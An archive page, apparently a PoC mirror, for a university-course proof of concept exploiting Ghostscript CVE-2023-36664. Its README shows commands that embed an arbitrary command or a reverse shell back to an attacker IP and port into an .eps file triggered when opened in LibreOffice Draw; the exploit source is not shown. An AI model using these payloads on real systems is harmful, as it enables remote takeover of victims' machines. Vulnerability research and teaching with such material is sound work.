Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-36664 PoC — Artifex Software Ghostscript 安全漏洞

Source
https://github.com/jeanchpt/CVE-2023-36664
Associated Vulnerability
Title:Artifex Software Ghostscript 安全漏洞 (CVE-2023-36664)
Description:Artifex Ghostscript through 10.01.2 mishandles permission validation for pipe devices (with the %pipe% prefix or the | pipe character prefix).
Description
Proof of concept developed for the CVE-2023-36664
Readme
# CVE-2023-36664 : Ghostscript remote code execution

Proof of concept for the CVE-2023-36664.

## Usage

To insert a payload into a `.eps` file :
```sh
python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefox
```

To insert a reverse shell payload into a `.eps` file :
```sh
python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234
```

The opening of the injected file in Libreoffice Draw should trigger the payload.

## Disclaimer

This proof of concept was developed for a specific course at university. It is published here only for pedagogical usage.
File Snapshot

 [4.0K]  /data/pocs/bfcfb327fe5434633fd9f441a1ad7b0af6d4d31c
├── [ 34K]  LICENSE
├── [1.4K]  poc.py
└── [ 672]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →